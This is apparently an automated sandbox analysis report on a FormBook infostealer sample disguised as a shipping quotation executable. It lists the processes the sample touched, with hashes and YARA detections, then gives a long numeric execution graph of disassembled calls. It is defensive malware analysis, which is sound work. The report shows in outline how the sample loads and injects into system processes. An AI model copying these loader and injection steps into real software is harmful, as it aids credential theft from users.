                                                                          Start time:10:46:16
                                                                          Start date:09/01/2025
                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\QUOTATION#070125-ELITE MARINE .exe"
                                                                          Imagebase:0xb10000
                                                                          File size:47'016 bytes
                                                                          MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.11733519795.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.11735115611.00000000038A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:10:47:07
                                                                          Start date:09/01/2025
                                                                          Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                          Imagebase:0x140000000
                                                                          File size:16'696'840 bytes
                                                                          MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:3
                                                                          Start time:10:47:08
                                                                          Start date:09/01/2025
                                                                          Path:C:\Windows\SysWOW64\cmdkey.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\cmdkey.exe"
                                                                          Imagebase:0xf0000
                                                                          File size:17'408 bytes
                                                                          MD5 hash:6CDC8E5DF04752235D5B4432EACC81A8
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.15246117394.0000000003320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.15246023580.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:4
                                                                          Start time:10:47:33
                                                                          Start date:09/01/2025
                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                          Imagebase:0x7ff74adc0000
                                                                          File size:597'432 bytes
                                                                          MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:2.7%
                                                                            Dynamic/Decrypted Code Coverage:2.1%
                                                                            Signature Coverage:3.5%
                                                                            Total number of Nodes:1622
                                                                            Total number of Limit Nodes:42
                                                                            execution_graph 95914 632de3 95915 632df0 95914->95915 95916 632e09 95915->95916 95917 672c2b 95915->95917 95930 633aa2 95916->95930 95919 672c47 GetOpenFileNameW 95917->95919 95921 672c96 95919->95921 95988 636b57 95921->95988 95925 672cab 95925->95925 95927 632e27 95958 6344a8 95927->95958 96000 671f50 95930->96000 95933 633ae9 96006 63a6c3 95933->96006 95934 633ace 95935 636b57 22 API calls 95934->95935 95937 633ada 95935->95937 96002 6337a0 95937->96002 95940 632da5 95941 671f50 95940->95941 95942 632db2 GetLongPathNameW 95941->95942 95943 636b57 22 API calls 95942->95943 95944 632dda 95943->95944 95945 633598 95944->95945 96057 63a961 95945->96057 95948 633aa2 23 API calls 95949 6335b5 95948->95949 95950 6335c0 95949->95950 95951 6732eb 95949->95951 96062 63515f 95950->96062 95956 67330d 95951->95956 96074 64ce60 41 API calls 95951->96074 95957 6335df 95957->95927 96075 634ecb 95958->96075 95961 673833 96097 6a2cf9 95961->96097 95962 634ecb 94 API calls 95964 6344e1 95962->95964 95964->95961 95966 6344e9 95964->95966 95965 673848 95967 67384c 95965->95967 95968 673869 95965->95968 95970 673854 95966->95970 95971 6344f5 95966->95971 96147 634f39 95967->96147 95969 64fe0b 22 API calls 95968->95969 95987 6738ae 95969->95987 96153 69da5a 82 API calls 95970->96153 96146 63940c 136 API calls 95971->96146 95975 632e31 95976 673862 95976->95968 95977 673a5f 95978 673a67 95977->95978 95979 634f39 68 API calls 95978->95979 96155 69989b 82 API calls 95978->96155 95979->95978 95984 639cb3 22 API calls 95984->95987 95987->95977 95987->95978 95987->95984 96123 69967e 95987->96123 96126 6a0b5a 95987->96126 96132 63a4a1 95987->96132 96140 633ff7 95987->96140 96154 6995ad 42 API calls 95987->96154 95989 636b67 95988->95989 95990 674ba1 95988->95990 95993 636ba2 95989->95993 95994 636b7d 95989->95994 95991 6393b2 22 API calls 95990->95991 95992 674baa 95991->95992 95992->95992 95995 64fddb 22 API calls 95993->95995 96501 636f34 22 API calls 95994->96501 95997 636bae 95995->95997 95999 64fe0b 22 API calls 95997->95999 95998 636b85 95998->95925 95999->95998 96001 633aaf GetFullPathNameW 96000->96001 96001->95933 96001->95934 96003 6337ae 96002->96003 96012 6393b2 96003->96012 96005 632e12 96005->95940 96007 63a6d0 96006->96007 96008 63a6dd 96006->96008 96007->95937 96009 64fddb 22 API calls 96008->96009 96010 63a6e7 96009->96010 96011 64fe0b 22 API calls 96010->96011 96011->96007 96013 6393c0 96012->96013 96014 6393c9 96012->96014 96013->96014 96016 63aec9 96013->96016 96014->96005 96014->96014 96017 63aed9 96016->96017 96018 63aedc 96016->96018 96017->96014 96022 64fddb 96018->96022 96020 63aee7 96032 64fe0b 96020->96032 96023 64fde0 96022->96023 96025 64fdfa 96023->96025 96028 64fdfc 96023->96028 96042 65ea0c 96023->96042 96049 654ead 7 API calls 96023->96049 96025->96020 96027 65066d 96051 6532a4 RaiseException 96027->96051 96028->96027 96050 6532a4 RaiseException 96028->96050 96031 65068a 96031->96020 96034 64fddb 96032->96034 96033 65ea0c 21 API calls 96033->96034 96034->96033 96035 64fdfa 96034->96035 96037 64fdfc 96034->96037 96054 654ead 7 API calls 96034->96054 96035->96017 96038 65066d 96037->96038 96055 6532a4 RaiseException 96037->96055 96056 6532a4 RaiseException 96038->96056 96041 65068a 96041->96017 96047 663820 96042->96047 96043 66385e 96053 65f2d9 20 API calls 96043->96053 96044 663849 RtlAllocateHeap 96046 66385c 96044->96046 96044->96047 96046->96023 96047->96043 96047->96044 96052 654ead 7 API calls 96047->96052 96049->96023 96050->96027 96051->96031 96052->96047 96053->96046 96054->96034 96055->96038 96056->96041 96058 64fe0b 22 API calls 96057->96058 96059 63a976 96058->96059 96060 64fddb 22 API calls 96059->96060 96061 6335aa 96060->96061 96061->95948 96063 63516e 96062->96063 96067 63518f 96062->96067 96066 64fe0b 22 API calls 96063->96066 96064 64fddb 22 API calls 96065 6335cc 96064->96065 96068 6335f3 96065->96068 96066->96067 96067->96064 96069 633605 96068->96069 96073 633624 96068->96073 96072 64fe0b 22 API calls 96069->96072 96070 64fddb 22 API calls 96071 63363b 96070->96071 96071->95957 96072->96073 96073->96070 96074->95951 96156 634e90 LoadLibraryA 96075->96156 96080 634ef6 LoadLibraryExW 96164 634e59 LoadLibraryA 96080->96164 96081 673ccf 96082 634f39 68 API calls 96081->96082 96084 673cd6 96082->96084 96086 634e59 3 API calls 96084->96086 96088 673cde 96086->96088 96186 6350f5 96088->96186 96089 634f20 96089->96088 96090 634f2c 96089->96090 96091 634f39 68 API calls 96090->96091 96093 6344cd 96091->96093 96093->95961 96093->95962 96096 673d05 96098 6a2d15 96097->96098 96099 63511f 64 API calls 96098->96099 96100 6a2d29 96099->96100 96329 6a2e66 96100->96329 96103 6a2d3f 96103->95965 96104 6350f5 40 API calls 96105 6a2d56 96104->96105 96106 6350f5 40 API calls 96105->96106 96107 6a2d66 96106->96107 96108 6350f5 40 API calls 96107->96108 96109 6a2d81 96108->96109 96110 6350f5 40 API calls 96109->96110 96111 6a2d9c 96110->96111 96112 63511f 64 API calls 96111->96112 96113 6a2db3 96112->96113 96114 65ea0c 21 API calls 96113->96114 96115 6a2dba 96114->96115 96116 65ea0c 21 API calls 96115->96116 96117 6a2dc4 96116->96117 96118 6350f5 40 API calls 96117->96118 96119 6a2dd8 96118->96119 96120 6a28fe 27 API calls 96119->96120 96121 6a2dee 96120->96121 96121->96103 96335 6a22ce 96121->96335 96124 64fe0b 22 API calls 96123->96124 96125 6996ae 96124->96125 96125->95987 96127 6a0b65 96126->96127 96128 64fddb 22 API calls 96127->96128 96129 6a0b7c 96128->96129 96495 639cb3 96129->96495 96133 63a52b 96132->96133 96138 63a4b1 96132->96138 96135 64fe0b 22 API calls 96133->96135 96134 64fddb 22 API calls 96136 63a4b8 96134->96136 96135->96138 96137 64fddb 22 API calls 96136->96137 96139 63a4d6 96136->96139 96137->96139 96138->96134 96139->95987 96141 63400a 96140->96141 96143 6340ae 96140->96143 96142 64fe0b 22 API calls 96141->96142 96145 63403c 96141->96145 96142->96145 96143->95987 96144 64fddb 22 API calls 96144->96145 96145->96143 96145->96144 96146->95975 96148 634f43 96147->96148 96149 634f4a 96147->96149 96150 65e678 67 API calls 96148->96150 96151 634f6a FreeLibrary 96149->96151 96152 634f59 96149->96152 96150->96149 96151->96152 96152->95970 96153->95976 96154->95987 96155->95978 96157 634ec6 96156->96157 96158 634ea8 GetProcAddress 96156->96158 96161 65e5eb 96157->96161 96159 634eb8 96158->96159 96159->96157 96160 634ebf FreeLibrary 96159->96160 96160->96157 96194 65e52a 96161->96194 96163 634eea 96163->96080 96163->96081 96165 634e6e GetProcAddress 96164->96165 96166 634e8d 96164->96166 96167 634e7e 96165->96167 96169 634f80 96166->96169 96167->96166 96168 634e86 FreeLibrary 96167->96168 96168->96166 96170 64fe0b 22 API calls 96169->96170 96171 634f95 96170->96171 96255 635722 96171->96255 96173 634fa1 96174 6350a5 96173->96174 96175 673d1d 96173->96175 96185 634fdc 96173->96185 96258 6342a2 CreateStreamOnHGlobal 96174->96258 96269 6a304d 74 API calls 96175->96269 96178 673d22 96180 63511f 64 API calls 96178->96180 96179 6350f5 40 API calls 96179->96185 96181 673d45 96180->96181 96182 6350f5 40 API calls 96181->96182 96183 63506e 96182->96183 96183->96089 96185->96178 96185->96179 96185->96183 96264 63511f 96185->96264 96187 635107 96186->96187 96188 673d70 96186->96188 96291 65e8c4 96187->96291 96191 6a28fe 96312 6a274e 96191->96312 96193 6a2919 96193->96096 96196 65e536 96194->96196 96195 65e544 96219 65f2d9 20 API calls 96195->96219 96196->96195 96198 65e574 96196->96198 96200 65e586 96198->96200 96201 65e579 96198->96201 96199 65e549 96220 6627ec 26 API calls 96199->96220 96211 668061 96200->96211 96221 65f2d9 20 API calls 96201->96221 96205 65e58f 96206 65e595 96205->96206 96207 65e5a2 96205->96207 96222 65f2d9 20 API calls 96206->96222 96223 65e5d4 LeaveCriticalSection 96207->96223 96209 65e554 96209->96163 96212 66806d 96211->96212 96224 662f5e EnterCriticalSection 96212->96224 96214 66807b 96225 6680fb 96214->96225 96218 6680ac 96218->96205 96219->96199 96220->96209 96221->96209 96222->96209 96223->96209 96224->96214 96228 66811e 96225->96228 96226 668177 96244 664c7d 20 API calls 96226->96244 96228->96226 96234 668088 96228->96234 96242 65918d EnterCriticalSection 96228->96242 96243 6591a1 LeaveCriticalSection 96228->96243 96230 668180 96245 6629c8 96230->96245 96232 668189 96232->96234 96251 663405 11 API calls 96232->96251 96239 6680b7 96234->96239 96235 6681a8 96252 65918d EnterCriticalSection 96235->96252 96238 6681bb 96238->96234 96254 662fa6 LeaveCriticalSection 96239->96254 96241 6680be 96241->96218 96242->96228 96243->96228 96244->96230 96246 6629d3 RtlFreeHeap 96245->96246 96247 6629fc 96245->96247 96246->96247 96248 6629e8 96246->96248 96247->96232 96253 65f2d9 20 API calls 96248->96253 96250 6629ee GetLastError 96250->96247 96251->96235 96252->96238 96253->96250 96254->96241 96256 64fddb 22 API calls 96255->96256 96257 635734 96256->96257 96257->96173 96259 6342bc FindResourceExW 96258->96259 96263 6342d9 96258->96263 96260 6735ba LoadResource 96259->96260 96259->96263 96261 6735cf SizeofResource 96260->96261 96260->96263 96262 6735e3 LockResource 96261->96262 96261->96263 96262->96263 96263->96185 96265 63512e 96264->96265 96268 673d90 96264->96268 96270 65ece3 96265->96270 96269->96178 96273 65eaaa 96270->96273 96272 63513c 96272->96185 96276 65eab6 96273->96276 96274 65eac2 96286 65f2d9 20 API calls 96274->96286 96276->96274 96277 65eae8 96276->96277 96288 65918d EnterCriticalSection 96277->96288 96278 65eac7 96287 6627ec 26 API calls 96278->96287 96281 65eaf4 96289 65ec0a 62 API calls 96281->96289 96283 65eb08 96290 65eb27 LeaveCriticalSection 96283->96290 96285 65ead2 96285->96272 96286->96278 96287->96285 96288->96281 96289->96283 96290->96285 96294 65e8e1 96291->96294 96293 635118 96293->96191 96295 65e8ed 96294->96295 96296 65e900 96295->96296 96297 65e92d 96295->96297 96299 65e925 96295->96299 96307 65f2d9 20 API calls 96296->96307 96309 65918d EnterCriticalSection 96297->96309 96299->96293 96300 65e937 96310 65e6f8 38 API calls 96300->96310 96303 65e91a 96308 6627ec 26 API calls 96303->96308 96304 65e94e 96311 65e96c LeaveCriticalSection 96304->96311 96307->96303 96308->96299 96309->96300 96310->96304 96311->96299 96315 65e4e8 96312->96315 96314 6a275d 96314->96193 96318 65e469 96315->96318 96317 65e505 96317->96314 96319 65e48c 96318->96319 96320 65e478 96318->96320 96325 65e488 96319->96325 96328 66333f 11 API calls 96319->96328 96326 65f2d9 20 API calls 96320->96326 96323 65e47d 96327 6627ec 26 API calls 96323->96327 96325->96317 96326->96323 96327->96325 96328->96325 96334 6a2e7a 96329->96334 96330 6350f5 40 API calls 96330->96334 96331 6a2d3b 96331->96103 96331->96104 96332 6a28fe 27 API calls 96332->96334 96333 63511f 64 API calls 96333->96334 96334->96330 96334->96331 96334->96332 96334->96333 96336 6a22e7 96335->96336 96337 6a22d9 96335->96337 96339 6a232c 96336->96339 96340 65e5eb 29 API calls 96336->96340 96359 6a22f0 96336->96359 96338 65e5eb 29 API calls 96337->96338 96338->96336 96364 6a2557 40 API calls 96339->96364 96341 6a2311 96340->96341 96341->96339 96343 6a231a 96341->96343 96343->96359 96372 65e678 96343->96372 96344 6a2370 96345 6a2374 96344->96345 96346 6a2395 96344->96346 96347 6a2381 96345->96347 96350 65e678 67 API calls 96345->96350 96365 6a2171 96346->96365 96352 65e678 67 API calls 96347->96352 96347->96359 96350->96347 96351 6a239d 96353 6a23c3 96351->96353 96354 6a23a3 96351->96354 96352->96359 96385 6a23f3 74 API calls 96353->96385 96356 6a23b0 96354->96356 96357 65e678 67 API calls 96354->96357 96358 65e678 67 API calls 96356->96358 96356->96359 96357->96356 96358->96359 96359->96103 96360 6a23de 96360->96359 96363 65e678 67 API calls 96360->96363 96361 6a23ca 96361->96360 96362 65e678 67 API calls 96361->96362 96362->96360 96363->96359 96364->96344 96366 65ea0c 21 API calls 96365->96366 96367 6a217f 96366->96367 96368 65ea0c 21 API calls 96367->96368 96369 6a2190 96368->96369 96370 65ea0c 21 API calls 96369->96370 96371 6a219c 96370->96371 96371->96351 96373 65e684 96372->96373 96374 65e695 96373->96374 96375 65e6aa 96373->96375 96403 65f2d9 20 API calls 96374->96403 96384 65e6a5 96375->96384 96386 65918d EnterCriticalSection 96375->96386 96378 65e69a 96404 6627ec 26 API calls 96378->96404 96379 65e6c6 96387 65e602 96379->96387 96382 65e6d1 96405 65e6ee LeaveCriticalSection 96382->96405 96384->96359 96385->96361 96386->96379 96388 65e624 96387->96388 96389 65e60f 96387->96389 96395 65e61f 96388->96395 96406 65dc0b 96388->96406 96438 65f2d9 20 API calls 96389->96438 96391 65e614 96439 6627ec 26 API calls 96391->96439 96395->96382 96399 65e646 96423 66862f 96399->96423 96402 6629c8 20 API calls 96402->96395 96403->96378 96404->96384 96405->96384 96407 65dc23 96406->96407 96411 65dc1f 96406->96411 96408 65d955 26 API calls 96407->96408 96407->96411 96409 65dc43 96408->96409 96440 6659be 62 API calls 96409->96440 96412 664d7a 96411->96412 96413 65e640 96412->96413 96414 664d90 96412->96414 96416 65d955 96413->96416 96414->96413 96415 6629c8 20 API calls 96414->96415 96415->96413 96417 65d976 96416->96417 96418 65d961 96416->96418 96417->96399 96441 65f2d9 20 API calls 96418->96441 96420 65d966 96442 6627ec 26 API calls 96420->96442 96422 65d971 96422->96399 96424 668653 96423->96424 96425 66863e 96423->96425 96427 66868e 96424->96427 96432 66867a 96424->96432 96446 65f2c6 20 API calls 96425->96446 96448 65f2c6 20 API calls 96427->96448 96429 668643 96447 65f2d9 20 API calls 96429->96447 96430 668693 96449 65f2d9 20 API calls 96430->96449 96443 668607 96432->96443 96435 66869b 96450 6627ec 26 API calls 96435->96450 96436 65e64c 96436->96395 96436->96402 96438->96391 96439->96395 96440->96411 96441->96420 96442->96422 96451 668585 96443->96451 96445 66862b 96445->96436 96446->96429 96447->96436 96448->96430 96449->96435 96450->96436 96452 668591 96451->96452 96462 665147 EnterCriticalSection 96452->96462 96454 66859f 96455 6685c6 96454->96455 96456 6685d1 96454->96456 96463 6686ae 96455->96463 96478 65f2d9 20 API calls 96456->96478 96459 6685cc 96479 6685fb LeaveCriticalSection 96459->96479 96461 6685ee 96461->96445 96462->96454 96480 6653c4 96463->96480 96465 6686c4 96493 665333 21 API calls 96465->96493 96467 6686be 96467->96465 96470 6653c4 26 API calls 96467->96470 96477 6686f6 96467->96477 96468 6653c4 26 API calls 96471 668702 CloseHandle 96468->96471 96469 66871c 96472 66873e 96469->96472 96494 65f2a3 20 API calls 96469->96494 96473 6686ed 96470->96473 96471->96465 96474 66870e GetLastError 96471->96474 96472->96459 96476 6653c4 26 API calls 96473->96476 96474->96465 96476->96477 96477->96465 96477->96468 96478->96459 96479->96461 96481 6653d1 96480->96481 96484 6653e6 96480->96484 96482 65f2c6 20 API calls 96481->96482 96483 6653d6 96482->96483 96486 65f2d9 20 API calls 96483->96486 96485 65f2c6 20 API calls 96484->96485 96487 66540b 96484->96487 96488 665416 96485->96488 96489 6653de 96486->96489 96487->96467 96490 65f2d9 20 API calls 96488->96490 96489->96467 96491 66541e 96490->96491 96492 6627ec 26 API calls 96491->96492 96492->96489 96493->96469 96494->96472 96496 639cc2 96495->96496 96497 64fe0b 22 API calls 96496->96497 96498 639cea 96497->96498 96499 64fddb 22 API calls 96498->96499 96500 639d00 96499->96500 96500->95987 96501->95998 96502 672ba5 96503 632b25 96502->96503 96504 672baf 96502->96504 96530 632b83 7 API calls 96503->96530 96545 633a5a 96504->96545 96508 672bb8 96510 639cb3 22 API calls 96508->96510 96512 672bc6 96510->96512 96511 632b2f 96520 632b44 96511->96520 96534 633837 96511->96534 96513 672bf5 96512->96513 96514 672bce 96512->96514 96515 6333c6 22 API calls 96513->96515 96552 6333c6 96514->96552 96528 672bf1 GetForegroundWindow ShellExecuteW 96515->96528 96521 632b5f 96520->96521 96544 6330f2 Shell_NotifyIconW 96520->96544 96527 632b66 SetCurrentDirectoryW 96521->96527 96523 672c26 96523->96521 96526 6333c6 22 API calls 96526->96528 96529 632b7a 96527->96529 96528->96523 96570 632cd4 7 API calls 96530->96570 96532 632b2a 96533 632c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96532->96533 96533->96511 96535 633862 96534->96535 96571 634212 96535->96571 96538 6338e8 96540 673386 Shell_NotifyIconW 96538->96540 96541 633906 Shell_NotifyIconW 96538->96541 96575 633923 96541->96575 96543 63391c 96543->96520 96544->96521 96546 671f50 96545->96546 96547 633a67 GetModuleFileNameW 96546->96547 96548 639cb3 22 API calls 96547->96548 96549 633a8d 96548->96549 96550 633aa2 23 API calls 96549->96550 96551 633a97 96550->96551 96551->96508 96553 6730bb 96552->96553 96554 6333dd 96552->96554 96556 64fddb 22 API calls 96553->96556 96607 6333ee 96554->96607 96558 6730c5 96556->96558 96557 6333e8 96561 636350 96557->96561 96559 64fe0b 22 API calls 96558->96559 96560 6730fe 96559->96560 96562 636362 96561->96562 96563 674a51 96561->96563 96622 636373 96562->96622 96632 634a88 22 API calls 96563->96632 96566 674a5b 96568 674a67 96566->96568 96569 63a8c7 22 API calls 96566->96569 96567 63636e 96567->96526 96569->96568 96570->96532 96572 6735a4 96571->96572 96573 6338b7 96571->96573 96572->96573 96574 6735ad DestroyIcon 96572->96574 96573->96538 96597 69c874 42 API calls 96573->96597 96574->96573 96576 63393f 96575->96576 96595 633a13 96575->96595 96598 636270 96576->96598 96579 673393 LoadStringW 96582 6733ad 96579->96582 96580 63395a 96581 636b57 22 API calls 96580->96581 96583 63396f 96581->96583 96591 633994 96582->96591 96603 63a8c7 96582->96603 96584 6733c9 96583->96584 96585 63397c 96583->96585 96588 636350 22 API calls 96584->96588 96585->96582 96587 633986 96585->96587 96589 636350 22 API calls 96587->96589 96590 6733d7 96588->96590 96589->96591 96590->96591 96592 6333c6 22 API calls 96590->96592 96593 6339f9 Shell_NotifyIconW 96591->96593 96594 6733f9 96592->96594 96593->96595 96596 6333c6 22 API calls 96594->96596 96595->96543 96596->96591 96597->96538 96599 64fe0b 22 API calls 96598->96599 96600 636295 96599->96600 96601 64fddb 22 API calls 96600->96601 96602 63394d 96601->96602 96602->96579 96602->96580 96604 63a8ea 96603->96604 96605 63a8db 96603->96605 96604->96591 96605->96604 96606 64fe0b 22 API calls 96605->96606 96606->96604 96608 6333fe 96607->96608 96609 633411 96608->96609 96610 67311d 96608->96610 96617 63a587 96609->96617 96612 64fddb 22 API calls 96610->96612 96614 673127 96612->96614 96613 63341e 96613->96557 96615 64fe0b 22 API calls 96614->96615 96616 673157 96615->96616 96618 63a59d 96617->96618 96620 63a598 96617->96620 96619 64fe0b 22 API calls 96618->96619 96621 67f80f 96618->96621 96619->96620 96620->96613 96621->96621 96623 6363b6 96622->96623 96624 636382 96622->96624 96623->96567 96624->96623 96625 674a82 96624->96625 96626 6363a9 96624->96626 96628 64fddb 22 API calls 96625->96628 96627 63a587 22 API calls 96626->96627 96627->96623 96629 674a91 96628->96629 96630 64fe0b 22 API calls 96629->96630 96631 674ac5 96630->96631 96632->96566 96633 668402 96638 6681be 96633->96638 96636 66842a 96639 6681ef 96638->96639 96649 668338 96639->96649 96653 658e0b 40 API calls 96639->96653 96641 6683ee 96657 6627ec 26 API calls 96641->96657 96643 668343 96643->96636 96650 670984 96643->96650 96645 66838c 96645->96649 96654 658e0b 40 API calls 96645->96654 96647 6683ab 96647->96649 96655 658e0b 40 API calls 96647->96655 96649->96643 96656 65f2d9 20 API calls 96649->96656 96658 670081 96650->96658 96652 67099f 96652->96636 96653->96645 96654->96647 96655->96649 96656->96641 96657->96643 96661 67008d 96658->96661 96659 67009b 96716 65f2d9 20 API calls 96659->96716 96661->96659 96663 6700d4 96661->96663 96662 6700a0 96717 6627ec 26 API calls 96662->96717 96669 67065b 96663->96669 96668 6700aa 96668->96652 96719 67042f 96669->96719 96672 6706a6 96737 665221 96672->96737 96673 67068d 96751 65f2c6 20 API calls 96673->96751 96676 6706ab 96677 6706b4 96676->96677 96678 6706cb 96676->96678 96753 65f2c6 20 API calls 96677->96753 96750 67039a CreateFileW 96678->96750 96682 6706b9 96754 65f2d9 20 API calls 96682->96754 96684 670781 GetFileType 96685 67078c GetLastError 96684->96685 96690 6707d3 96684->96690 96757 65f2a3 20 API calls 96685->96757 96686 670756 GetLastError 96756 65f2a3 20 API calls 96686->96756 96687 670704 96687->96684 96687->96686 96755 67039a CreateFileW 96687->96755 96759 66516a 21 API calls 96690->96759 96691 670692 96752 65f2d9 20 API calls 96691->96752 96692 67079a CloseHandle 96692->96691 96696 6707c3 96692->96696 96695 670749 96695->96684 96695->96686 96758 65f2d9 20 API calls 96696->96758 96697 6707f4 96699 670840 96697->96699 96760 6705ab 72 API calls 96697->96760 96704 67086d 96699->96704 96761 67014d 72 API calls 96699->96761 96700 6707c8 96700->96691 96703 670866 96703->96704 96705 67087e 96703->96705 96706 6686ae 29 API calls 96704->96706 96707 6700f8 96705->96707 96708 6708fc CloseHandle 96705->96708 96706->96707 96718 670121 LeaveCriticalSection 96707->96718 96762 67039a CreateFileW 96708->96762 96710 670927 96711 67095d 96710->96711 96712 670931 GetLastError 96710->96712 96711->96707 96763 65f2a3 20 API calls 96712->96763 96714 67093d 96764 665333 21 API calls 96714->96764 96716->96662 96717->96668 96718->96668 96720 67046a 96719->96720 96721 670450 96719->96721 96765 6703bf 96720->96765 96721->96720 96772 65f2d9 20 API calls 96721->96772 96724 67045f 96773 6627ec 26 API calls 96724->96773 96726 6704a2 96727 6704d1 96726->96727 96774 65f2d9 20 API calls 96726->96774 96735 670524 96727->96735 96776 65d70d 26 API calls 96727->96776 96730 67051f 96732 67059e 96730->96732 96730->96735 96731 6704c6 96775 6627ec 26 API calls 96731->96775 96777 6627fc 11 API calls 96732->96777 96735->96672 96735->96673 96736 6705aa 96738 66522d 96737->96738 96780 662f5e EnterCriticalSection 96738->96780 96740 665234 96742 665259 96740->96742 96746 6652c7 EnterCriticalSection 96740->96746 96749 66527b 96740->96749 96784 665000 21 API calls 96742->96784 96743 6652a4 96743->96676 96745 66525e 96745->96749 96785 665147 EnterCriticalSection 96745->96785 96748 6652d4 LeaveCriticalSection 96746->96748 96746->96749 96748->96740 96781 66532a 96749->96781 96750->96687 96751->96691 96752->96707 96753->96682 96754->96691 96755->96695 96756->96691 96757->96692 96758->96700 96759->96697 96760->96699 96761->96703 96762->96710 96763->96714 96764->96711 96766 6703d7 96765->96766 96769 6703f2 96766->96769 96778 65f2d9 20 API calls 96766->96778 96768 670416 96779 6627ec 26 API calls 96768->96779 96769->96726 96771 670421 96771->96726 96772->96724 96773->96720 96774->96731 96775->96727 96776->96730 96777->96736 96778->96768 96779->96771 96780->96740 96786 662fa6 LeaveCriticalSection 96781->96786 96783 665331 96783->96743 96784->96745 96785->96749 96786->96783 96787 63dee5 96790 63b710 96787->96790 96791 63b72b 96790->96791 96792 6800f8 96791->96792 96793 680146 96791->96793 96819 63b750 96791->96819 96796 680102 96792->96796 96799 68010f 96792->96799 96792->96819 96856 6b58a2 207 API calls 96793->96856 96854 6b5d33 207 API calls 96796->96854 96816 63ba20 96799->96816 96855 6b61d0 207 API calls 96799->96855 96802 64d336 40 API calls 96802->96819 96803 6803d9 96803->96803 96805 63bbe0 40 API calls 96805->96819 96808 63ba4e 96809 680322 96859 6b5c0c 82 API calls 96809->96859 96816->96808 96860 6a359c 82 API calls 96816->96860 96818 63a8c7 22 API calls 96818->96819 96819->96802 96819->96805 96819->96808 96819->96809 96819->96816 96819->96818 96821 63ec40 96819->96821 96845 63a81b 41 API calls 96819->96845 96846 64d2f0 40 API calls 96819->96846 96847 64a01b 207 API calls 96819->96847 96848 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96819->96848 96849 64edcd 22 API calls 96819->96849 96850 6500a3 29 API calls 96819->96850 96851 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96819->96851 96852 64ee53 82 API calls 96819->96852 96853 64e5ca 207 API calls 96819->96853 96857 63aceb 23 API calls 96819->96857 96858 68f6bf 23 API calls 96819->96858 96843 63ec76 96821->96843 96822 650242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96822->96843 96823 6501f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96823->96843 96825 63fef7 96833 63a8c7 22 API calls 96825->96833 96838 63ed9d 96825->96838 96826 64fddb 22 API calls 96826->96843 96828 684b0b 96864 6a359c 82 API calls 96828->96864 96829 63a8c7 22 API calls 96829->96843 96830 684600 96834 63a8c7 22 API calls 96830->96834 96830->96838 96833->96838 96834->96838 96836 63fbe3 96836->96838 96839 684bdc 96836->96839 96844 63f3ae 96836->96844 96837 63a961 22 API calls 96837->96843 96838->96819 96865 6a359c 82 API calls 96839->96865 96840 6500a3 29 API calls 96840->96843 96842 684beb 96866 6a359c 82 API calls 96842->96866 96843->96822 96843->96823 96843->96825 96843->96826 96843->96828 96843->96829 96843->96830 96843->96836 96843->96837 96843->96838 96843->96840 96843->96842 96843->96844 96861 6401e0 207 API calls 96843->96861 96862 6406a0 41 API calls 96843->96862 96844->96838 96863 6a359c 82 API calls 96844->96863 96845->96819 96846->96819 96847->96819 96848->96819 96849->96819 96850->96819 96851->96819 96852->96819 96853->96819 96854->96799 96855->96816 96856->96819 96857->96819 96858->96819 96859->96816 96860->96803 96861->96843 96862->96843 96863->96838 96864->96838 96865->96842 96866->96838 96867 106bee0 96881 1069b30 96867->96881 96869 106bf82 96884 106bdd0 96869->96884 96871 106bfab CreateFileW 96873 106bfff 96871->96873 96874 106bffa 96871->96874 96873->96874 96875 106c016 VirtualAlloc 96873->96875 96875->96874 96876 106c034 ReadFile 96875->96876 96876->96874 96877 106c04f 96876->96877 96878 106add0 13 API calls 96877->96878 96879 106c082 96878->96879 96880 106c0a5 ExitProcess 96879->96880 96880->96874 96887 106cfb0 GetPEB 96881->96887 96883 106a1bb 96883->96869 96885 106bdd9 Sleep 96884->96885 96886 106bde7 96885->96886 96888 106cfda 96887->96888 96888->96883 96889 631044 96894 6310f3 96889->96894 96891 63104a 96930 6500a3 29 API calls 96891->96930 96893 631054 